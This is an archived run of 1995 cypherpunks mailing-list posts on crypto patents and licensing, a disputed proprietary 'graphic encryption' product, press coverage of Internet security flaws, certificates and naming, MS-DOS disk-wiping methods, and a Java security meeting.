> > systems, air traffic control systems and defence systems (the recent
> > failure of the computerized system controlling the London Ambulance
> > Service provides an example of how serious software failure can be).

and Perry responds:
> I far prefer trusting robust and failsafe engineering in such
> situations. Theorem provers can't account for what happens when the
> one in a billion DRAM corruption occurs, or someone kicks the cable
> connecting the machine to its disks, or when a nut shoots the sensors,
> or whatever. Well built systems fail in a safe manner because of good
> engineering design -- as an example, in we hope that the motor
> controller might die but the motor won't eat itself anyway no matter
> what garbage it puts out. Such design is needed whether the systems
> are "formally proven" or not -- and frankly, I can't see formal proofs
> having much of an impact given that you are in the end simply shifting
> the problem to bug-free specifications and yet still have to worry
> about failures in the system.

Hence comes my response:

I think that both formal methods and defense-in-depth are important
in building an effective protection program.

	- Formal methods are very important for detecting flaws and
	  producing what is commonly called "Fault Intollerance", but

	- Defense-in-depth is important because there are no perfect
	  technical defenses.  This is commonly called "Fault Tollerance"

The most secure (and often highest quality) systems combine fault
intollerance with fault tollerance to produce high quality parts and a
system that continues operating safely even when those high quality
parts fail.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 10:14:42 PDT
To: cypherpunks@toad.com
Subject: Commercialism on Cypherpunks
Message-ID: <aca2962403021004ea77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



We face interesting times.

It's apparent that the Cypherpunks list is now becoming even more of a
hangout for reporters, commercial vendors, and those seeking advance
knowledge of security holes and whatnot...maybe even a few stock traders
looking for tips :-}. It was this way to some extent a few years ago, with
Steven Levy, John Markoff, Kevin Kelly, Julian Dibbell, and others looking
to our list for stimulating ideas for stories. Now, the time between
something being posted here and its headline appearance in one of the major
papers is even shorter. The "electronic commerce" business is heating up,
and basic flaws and limitations are obviously big news.

And the list has grown in recent months, as publicity has increased.

In addition to the usual corporate connections that people have because
some corporation employs them, we have people _directly_ involved in
several crypto-related or security-oriented businesses, including Netscape
Communications, Digicash, First Virtual, Enterprise Integration
Technologies, RSADSI, Verity, Intuit, and so on. And a bunch of folks of
course from Sun, SGI, Apple, Microsoft, etc. (Sorry if I've left out your
company.)

Clearly some of these groups have conflicting goals and approaches. Some
have different exposures to security holes. Some of these electronic
commerce companies even stand to gain at the expense of others when
security problems are found.

Some of the commercial folks are concerned that the freewheeling, anarchic,
"say anything" nature of the Cypherpunks list is sometimes reflecting badly
on their companies. Some are concerned that reporters are reading the list
to find leads for stories.

Well, get used to it! (Lest you think I was going to pull a Rodney King and
say "Can't we all just get along?," I'm taking the anarchist route.)

People will say what they wish. Sometimes they'll speak inaccurately,
sometimes without all of the facts. Such is life.

There is no moderator, no leader, contrary to what at least one reporter
seems to think. And it's a good thing, as I could otherwise see that
moderator or leader someday being served with papers because of some insult
or denigration about a company or its products posted here. With the
"electronic commerce" market heating up so much, and with our list becoming
one of the several de facto watering holes where gossip and G-2 gets
exchanged, there are bound to be conflicts and alleged damages to
reputations.

Think of our list as a kind of Casablanca, a "free city" not controlled by
any side. I'm "shocked, simply shocked," that anyone would think it could
be anything else.


--Tim, owner since 1992 of "Rick's Place"

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )Steve Orrin@ix.netcom.com, Mgr.Tech.Services@ix.netcom.com,       PrivaSoft@ix.netcom.com
Date: Thu, 12 Oct 95 10:33:52 PDT
To: cypherpunks@toad.com
Subject: responce to graphic encryption replies
Message-ID: <199510121733.KAA18977@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


   First, I would like to address the issue of David C.'s spam of the 
usenet. Mr. Clavedetcher does not work for nor does he represent us in 
any way. After receiving word from Cypherpunks that he had spamed the 
list I personally contacted him and informed him to cease and desist 
these actions or face legal action. We at PrivaSoft do not conduct nor 
condone such actions on the Net. During my conversation with him I 
discovered he was a zealous individual looking to make good on our 
rebate program, as per our Web page. If you should receive any further 
spams from him or any other over zealous netuser, Please contact me 
immediately. Also if you could inform me of other news groups/ lists he 
spammed so I may contact them as well regarding this. Thanx.

    Second I would like to begin addressing several of the issues 
raised by my inquiry of Graphic Encryption. Firstly Graphic Encryption 
is the scrambling of a graphic image using an encryption algorithm. In 
PrivaSoft's case the Image is that of your document, including all text 
and graphics contained therein. Syntel Sciences, the distributor of 
PrivaSoft, does not wish to publish its algorithm at this time, however 
if there is any question as to the strength of PrivaSoft and its 
Graphic Encryption engine, I would be happy to post a sample document 
for you to try and crack. Also, I have recently put together an info 
sheet on the Security provided by PrivaSoft which I can post if there 
is interest. 

    One of the key strengths, as I see it, of graphic encryption is 
that during decryption via hacking, there is an added time element when 
a human interface is required to verify the product, ( since it is a 
graphic picture being produced, regular checksums for intelligible 
words can't be used sans implementing OCR), even if this is only 10 
milliseconds per try this is increases the time to crack exponentially 
beyond that of a data encrypted document of similar key length and 
algorithm strength. 

    Once again I would like to apologize on behalf of Syntel Sciences - 
PrivaSoft for the nuisance caused by the spam done by David C. and I 
wish to reiterate that such actions are not condoned by us and will not 
be tolerated.

Steve Orrin
Mgr. Tech. Services,  PrivaSoft

*************************************************
PrivaSoft TM                                    *
Distributed by Syntel Sciences, Inc. USA        *
1877 Springfield Ave PO BOX 600                 *
 Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 12 Oct 95 07:38:01 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <v02120d04aca21d2bcd71@[199.2.22.120]>
Message-ID: <wkTGSPCMc50eA1MGoJ@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 11-Oct-95 Re: NYT on Internet Flaws Douglas
Barnes@communiti (1042*)

> It is profoundly irritating to find this splashed on the
> front page of the NYT, contributing to the FUD that
> largely benefits luddites like First Virtual and
> those, like MS$, pushing for a return to proprietary networks.

???Luddites???  Excuse me, have I missed something?  Let's look at FV's
founders:

-- Einar Stefferud is one of the grand old men of the Internet, a major
contributor to Internet standards efforts for over 20 years, and a
behind the scenes player in almost every major email-related development
in the last 20 years.

-- Marshall Rose is the author of SNMP, lots of widely used software,
and six books on Internet-related technology.  He's been a major factor
for progress in IETF and Interop for many years.

-- I'm one of the authors of MIME and lots of widely used software.  I
am most commonly criticized for being technology-crazy, as in the
multimedia excesses of the CMU Andrew system, rather than for being a
Luddite.

Collectively, I'd venture to say that FV's people have pushed the
Internet envelope more than any other similarly-sized group of people
you could find anywhere on the planet.  And in our current incarnation,
we deployed the first Internet-wide open payment system, and have run it
through a year (this coming Sunday) of exponential growth with only a
few days of downtime.

As I understand it, a "Luddite" is someone who is unreasonably opposed
to technological innovation.  The only thing I can assume is that, in
your lexicon, "Luddite" is synonymous with "sees problems with the
deployment of public key encryption technology to the masses".  If
believing that cryptography isn't magic and isn't a perfect solution to
all problems makes us Luddites, then we're Luddites.  

In point of fact, we're very heavy users of cryptography internally, we
have just chosen not to make all our users master its subtleties.  Watch
for the first visible use of cryptography in our system, coming soon --
we're going to push the envelope in the safe deployment of cryptography,
too.  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 12 Oct 95 10:47:43 PDT
To: cypherpunks@toad.com
Subject: Re: RSA Data Security, Inc. To Exclusively License Rights to RSA
In-Reply-To: <9509128135.AA813510342@snail.rsa.com>
Message-ID: <199510121746.KAA07243@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> writes:

>REDWOOD CITY, Calif.--(BUSINESS WIRE)--Oct. 12, 1995--RSA Data Security, Inc. 
>today announced that it is now licensing patents for the Digital Signature 
>Standard (DSS), the U.S. government standard for digital signatures.

I'm sure that everyone will join me in a rousing Bronx cheer for RSA as
they continue their efforts to monopolise public key cryptography.  If
they truly have a patent on DSS this will be yet another important
algorithm for which people have to get RSA's permission.  RSA is fast
entering the list of such well loved institutions as the Post Office and
the Internal Revenue Service as one of those places you can't avoid
dealing with no matter how you try.

"Ever been sued for patent infringement?
You will!
And the company that will stick it to you?
RSA."

Hal, the intemperate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 17:49:49 PDT
To: raph@CS.Berkeley.EDU (Raph Levien)
Subject: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510012231.PAA00669@kiwi.cs.berkeley.edu>
Message-ID: <199510120047.KAA13489@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hello Raph Levien <raph@CS.Berkeley.EDU>

You write:
> Here is a draft of the CJR I intend to file, for the perl-RSA t-shirt.
...

IANAL, and I know absolutely *nothing* about what a CJR should look like.

...
> ORIGIN OF COMMODITY
...
> The cryptographic algorithm implemented in this t-shirt comes from
> various sources, at various times, and was produced with both private
> and public sources of funding.

I don't think this is accurate: I guess this applies to the book
which contains several algorithms. As far as I know, the RSA alg.
comes from one source at one time.

...
> CURRENT USE
> 
> The t-shirt is intended as an implementation of the RSA cipher for
> those who wish to incorporate encryption into their communications.
> The small size of the implementation makes it particularly useful in
> contexts in which existing cryptographic infrastructure is not
> available.
...

Perhaps somebody should make IDEA shorts?

Then it would be interoperable with PGP...
(Would tooooo. You just have to remember what the header is.)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHxllCxV6mvvBgf5AQEN8wQApplb/R+FLZcUU4ro6c8d4DIcCYK0KIbT
5LGfhtq5tN9IJPZ/00Z/otHDBztD+PDEzC2KI2EI724FEOAtvHR6ZnopkWcST500
2Ly/OEJJ+oAO2IyOkbyJ3AQCax6RkCGLrFiSGSi4N5Z24ZZ3Ovp+LTzqxyEF/81y
6Vu1dRK1Zuk=
=3J6S
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 07:55:15 PDT
To: David Berger <dvberger@eit.com>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510111812.LAA21331@viper.eit.com>
Message-ID: <199510121454.KAA20694@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Berger writes:
> As a result, the only thing I think this article should say is that we need
> secure ftp.  Isn't this being worked on?

Well, in addition, universal deployment of Photuris and IPSP would
probably prevent the sort of active attack being discussed because you
could no longer replace the packets.

> As for the article - 9/10 scaring people, 1/10 semi-fact.  Be serious?  NFS
> is not the basic structure of the Internet.  I'm embarrassed that an article
> so weak in its explanations and so high on fluff appeared on the front page
> of a well respected newspaper.

It was suprisingly weak for a John Markoff story (he usually gets the
details exactly right) but it is an issue that had to be brought up
and I see no reason to call it a bad article overall. The alarmism is
needed -- people have to get off their asses (including me).
 
Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Wed, 11 Oct 95 18:17:34 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix POTP
In-Reply-To: <199510111433.KAA46776@tequesta.gate.net>
Message-ID: <9510120118.AA45953@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

liberty@gate.net (Jim Ray) wrote:
  and Kari asked:
  >Maybe you could name those experts who have inspected it - thanks.

  Um, in an earlier post she mentioned the venerable Mr. Kahn and
  someone else whose name I forget.

I noted at the time that I didn't know any of the
names, except Kahn, and only later realised that
this is the Kahn who wrote the book, not the Karn
who is a cryptographer. I don't know whether David
Kahn actually has any credentials at all as a
cryptographer. Does anyone else?

Note I'm not trying to discredit Elementrix POTP,
and especially not David Kahn who wrote a very
important book.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHxs96RQkCwJ0+ZNAQFaOQP+MCk6kEjdwXmWIb56SIo1frZSp3Ynvxul
6TpcEz1PgNHEzHu7DVlwbNiCFc7eCCJpI8kB+pU/bB5q6Q4G88DNfmULc0NSYApI
QWfer0DuuUrE2mZcknZTRb+3zMrzzd/AjGXnujE2SEODmKtc+1yAYhdgZchRYfTY
w/yiLWpnxgA=
=z10F
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Thu, 12 Oct 95 11:59:13 PDT
To: cypherpunks@toad.com
Subject: Oct 14 meeting, focus on Java, Mountain View, California
Message-ID: <199510121831.LAA02357@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello again -

First, my sincere apologies for not making it clear in the first 
announcement that the Oct 14 meeting focussing on Java is being
held in the bay area of California.   

Next, feel free to speak up for speaker slots if you're so inclined.
I was surprised no one wrote in to ask for speaker slots although
a lot of people wrote in to ask for more details on where the meeting
was and others wrote in to chastise me (correctly) for being so 
bayAreaCentric. 

Saturday Oct 14

         Time: 12 noon - 6 p.m.

        Place: Sparcy's cafeteria, building 21, Sun Microsystems
               Mountain View, California

  AgendaSoFar: 12 - 12:15    - Settle in, have a bagel
	       12:15 - 12:45 - Overview of Java/HotJava
	       12:45 - 2:00  - Java Security Model, Sami Shaio, Java group, Sun
	        2:00 - 3:00  - discussion, Q&A, open mike
		3:00 - 3:30  - break
		3:30 - 4:30  - Jcrypt, Doug Barnes, Amanda Chou
		4:30 - 6:00  - TBD

   Directions: Take 101 to Amphitheater Parkway.  Turn left
               onto Garcia, and drive about 1/2 mile and turn
               onto the first genuine side street which is
	       named Marina Way.   Drive about 1/4 mile and look 
	       for a right hand turn onto Coast.   Building 21
	       will be on your left.  It's on the corner of Coast
	       and Marina Way.   There's plenty of parking there. 

    Internet:  I'm trying to arrange to get a computer connected to 
	       the net in that room so that we can set up MBONE, 
	       but I don't know if that will be possible or not. 
               

Enough people wrote in to say that they'd like to hear a bit about
Java and HotJava (and how Netscape is using Java) to convince me
it would be a good idea to start off with setting some context. 

See you on Saturday!  Should be fun.  

Marianne
mrm@netcom.com
mrm@eng.sun.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 12 Oct 95 09:41:53 PDT
To: David Berger <dvberger@eit.COM>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510111812.LAA21331@viper.eit.com>
Message-ID: <Pine.SUN.3.90.951012113815.25976A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I use SSLftp all the time 8)

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 11 Oct 1995, David Berger wrote:

> As a result, the only thing I think this article should say is that we need
> secure ftp.  Isn't this being worked on?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 18:47:53 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510060419.VAA20574@jobe.shell.portal.com>
Message-ID: <199510120147.LAA13833@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

Hal writes:
> >In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> 
> >> OK, so suppose I want to send my credit card number to Egghead Software.
...
[previous reply elided]

What you are missing is that you should not say
  "I want to send my credit card number to Egghead Software"
you should say
  "I want to send my credit card number to 12 34 56 78 9A BC DE F0"

> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.

The certificates you'd want are:
  * informal correspondence from your friends that 12 34 56 78 9A BC DE F0
makes good widgets/gadgets/whatzits.
  * a Consumers Association report saying that 12 34 56 78 9A BC DE F0's
widgets don't have sharp edges like 13 25 36 47 58 69 7A 8B's do and
that 43 65 87 09 41 61 BA ED's are less efficient (eg "Choice" magazine).
  * possibly a certificate from the bank that 12 34 56 78 9A BC DE F0
is a merchant (if using traditional CCs).
  * or a certificate from a guarantor company saying that if
12 34 56 78 9A BC DE F0 doesn't deliver they'll return your money.

> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

Yeah, I just can't imagine myself at a party introducing myself
"Hi, I'm 08 04 26 6D 01 CD AB 8A  25 A9 E2 86 AD 13 C1 BA".

Then again I never was good at parties...


To start a new sub-thread: what if the man in the middle is actually
a behaviour-modifying parasite? At that stage even a physical meeting
won't do you much good (the parasite may be otherwise asymptomatic).

It's probably more likely than having 30 FBI agents assigned to your
case...


Hope I'm making sense... (well, they say that hope dies last, no?)

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHxzWSxV6mvvBgf5AQHXawP/Xls4gWUwhTFoX9w4TYaKvqbK8MF+dxgS
JPmIWdfiEijbRb/qOLzU+7NJqZ3OqcR+Ylc8uBcQPhYJgOwDSta1BYm0OrYhb+PY
6ILXeulp/2T5Y061KrbkFgJ3Z5AcsFTCBad2pHQeIzdlIixv2JPT+qbb5iEkDkgA
ebEioYxWgP0=
=pFkN
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Thu, 12 Oct 95 08:50:35 PDT
To: rah@shipwright.com
Subject: Re: PC disk wipe software
Message-ID: <951012115021_122212260@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 95-10-09 12:34:33 EDT, you write:

>>PC Tools has a wipe program that will either wipe individual files, or
>>wipe all unallocated diskspace. It also allows you to choose the level
>>of wipe (single overwrite, multiple, etc).
>
>There has been considerable discussion on the MCIP list about how most
>*Mac* programs that purport to do this, like Burn, for example, leave stuff
>over in disk blocks. My understanding is that this is not a trivial
>problem, and it occurs in MUSH-DOS as well....
>
>Cheers,
>Bob Hettinga
>
>

Actually not a problem for mess-DOS: just overwrite to the next multiple of
the allocation unit size. Trivial indeed.  What you must *not* do is just
write to the end of current file ... you have to extend.  Good idea too is to
flush file buffers/reset disk subsystem before the next file writes so that
buffer garbage doesn't get stuck in at end of last sector(s) of new files.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Thu, 12 Oct 95 08:51:07 PDT
To: perry@piermont.com
Subject: Re: PC disk wipe software
Message-ID: <951012115020_122212234@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


MS-DOS? Selectively overwrite data not alloc'ed to files?  Try this:  I do it
all the time:

open a file for output
write garbage to file until the disk fills
delete file
do it again

... what could be simpler?  This will fill all unused allocation units with
garbage.  Do it until you feel comfortable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Thu, 12 Oct 95 08:50:39 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <951012115032_122212345@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 95-10-09 22:07:18 EDT, you write:

>
>Archive data off to tape, low level format drive using the bios hd utils,
>reformat drive, restore data. I find the non graphical AMI bios very useful
>for this.
>
>Doing anything else fails to remove the old data on partially used but valid
>blocks.
>
>

Why do people insist this is the case?
ABsolutely not true under MS-DOS.
I haven't personally verified under a VxD file system (like 32bit disk
access) but ask yourself: if I expand (by appending new garbage data) the
current file to the next allocation-unit boundary, will that overwrite the
tail blocks of the current file????  Folks: it's sooooo easy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 12 Oct 95 12:00:07 PDT
To: (Recipient list suppressed)
Subject: Cylink license fees
Message-ID: <v02120d03aca31f3702e4@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I just received a very informative package of information
from Bob Fougner at Cylink, which, in addition to a copy
of the relevant patents and hardcopy of the materials
available on their web page, contains a "limited time offer" to
license their patents in one of three ways:

  1) Practice of DH Key exchange & DSS:     $50,000

  2) Right to use & distribute RSA:         $62,500

  3) Ulimited field of use to practice
     public key:                            $75,000

Those interested in obtaining this information should
probably fax him at  408-735-6642 with a request for
the info. Much of the information is available online
at: http://www.cylink.com.

Obviously, anyone wishing to practice RSA would also
need to get a license from RSADSI.

Also, it is my impression that are claiming Hellman-Merkle
as the precursor patent to RSA, which means that this
situation will prevail at least through late 1997, not early
1997 (when Hellman-Diffie expires.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Thu, 12 Oct 95 13:19:43 PDT
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Oct 14 meeting, focus on Java, Mountain View, California
In-Reply-To: <199510121831.LAA02357@netcom20.netcom.com>
Message-ID: <199510121911.MAA07717@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I seem to recall you from the compiler group at sun(SUNPRO)
I think we met at tom kesslers going away party
are you that person???

    cheers
    kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 19:23:06 PDT
To: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Subject: Re: Elementrix Press Release
In-Reply-To: <m0t0p9k-000BVpC@ulf.mali.sub.org>
Message-ID: <199510120222.MAA13959@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)

- From the press release:
> >    "Elementrix has found a logical way to generate non-algorithmic,
> >dynamically changing keys at two separate sites without transmitting
> >them on the line and without using parallel lines," said Dr. David Kahn,

Ulf Moeller responds:
> Obviously they have invented a telepathic key exchange scheme.

Actually, when I read the above I thought of Quantum Mechanics, 
but I would expect you'd need special hardware for that.
(In fact I'd expect you'd need special comms lines for that, but
certainly at least the equipment at the two ends.)

Still, who knows what surprises QM can provide?

In which case calling it a "telepathic key exchange scheme" might
be quite appropriate :-)


However, Occam's razor points to cluelessness.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHx7uCxV6mvvBgf5AQEkVAP+NBgn59bOX+ydhcmz2HNSC1k6qdr6Y5xE
bre/zepTJ2h1v+8cSQfJMLNfiA36bBtGxxpPvV09Ojn9KJTZhmvyCtN99VG71DZc
SxL/ji0KnWCFkAT4v2IKSK4vUwAs71GjXeNb9RicrcfIOPc7FAFyJZ9DsGbQUUZ2
eoVsPkde4K8=
=OJs9
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 09:36:33 PDT
To: Nesta Stubbs <nesta@cynico.com>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Pine.BSD.3.91.951011223850.13193B-100000@miso.wwa.com>
Message-ID: <199510121636.MAA20825@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Nesta Stubbs writes:
> note: is anyone working on implementeing some of the things outlines in 
> R(1825?) ?  I think Perry posted regarding it awhile back, but havent 
> heard much about it since.

Yes, work is going on on the IPSEC stuff, though my own is stalled at
the moment because of excessive personal scheduling load...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 09:41:24 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510120410.AA28665@sulphur.osf.org>
Message-ID: <199510121638.MAA20833@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> >        I understand though, that we can't control what the reporters
> >say and how they interpret what we say. It is very important to word
> >your posts carefully such that when you post a bug a reporter won't
> >think that they should write an article on it until it is verified.
> 
> NO!
> 
> Something like Perry's "Do not redistribute without permission" should
> be the only modification needed.

I am frequently informed before people redistribute, but not always,
I'm afraid.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Thu, 12 Oct 95 10:47:17 PDT
To: cypherpunks@toad.com
Subject: Privsoft
Message-ID: <199510121746.NAA01600@soggy-fibers.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I hope Mr. Orrin has his asbestos codpiece well positioned.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 21:01:12 PDT
To: bryce@colorado.edu
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510070102.TAA14826@nagina.cs.colorado.edu>
Message-ID: <199510120358.NAA14220@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and hallc@cs.colorado.edu
  and Bryce <wilcoxb@nagina.cs.colorado.edu>

Bryce wrote:
... [about MITM] ...
> all a True Name is really necessary for
> is violence.  (And, pending certain eagerly-awaited technological
> developments, for sex.))
...

Why is a true name necessary for sex? It should be feasible to arrange
a romantic rendezvous without True Names, no?
How often have you checked IDs before going on a date?

(I think most normal people would notice a MITM during, er, never mind.)

You simply arrange time, place, sign/counter-sign.

Anything I've missed?

> Now I have four things to say about this "evasion of Mitch" thing.
> Don't worry, they are all short and some of them are interesting.
...

For thing number five from your next post: I find it amusing that
octets seven and eight of my fingerprint resemble the name of
a certain Swedish group of singers. Mama mia!


Here I go again, my my, how can I resist... stop humming to yourself!

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHySUSxV6mvvBgf5AQHQRwP+OHsQ0YFtbgDipZPcEm9W6JdLOIl7rlSK
Y9bjDlJ0Z4B/Cy9T1+gEtCDp3EOFVmq+B7CLmbEKb+PqgiMHIf5oJ/8Xt7+4p9gr
FBprEoK8wk6SCUY3EKDakwpXpsf9HJGI4jwpJonRnlQGxUE0f4n3zVBoLQwNiLYk
XBKvMZ1Ln1Y=
=2fMz
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lesan <lesan_robert@tandem.com>
Date: Thu, 12 Oct 95 12:01:10 PDT
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <307D818B.1D33@tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


I am a contractor currently working for Tandem Computers, and I found this 
press release interesting.  Thought this group might need a target of a 
different flavor to kick around:


SUBJECT: PRESS RELEASE: ATALLA WEBSAFE

ATALLA BEGINS SHIPPING HARDWARE-BASED SECURITY FOR THE INTERNET

SAN JOSE, CALIFORNIA - October 2, 1995 - Atalla, a Tandem
Company, announces that the WebSafe Internet Security Processor
is ready for shipment. Now you can use the same technology that made
the "bank ATM" network safe enough for bank transactions to secure
the Internet for commerce.

"The Internet is a 'party-line' where everyone can jump in. Our vision
is to make it a 'private-line' for those situations where privacy is
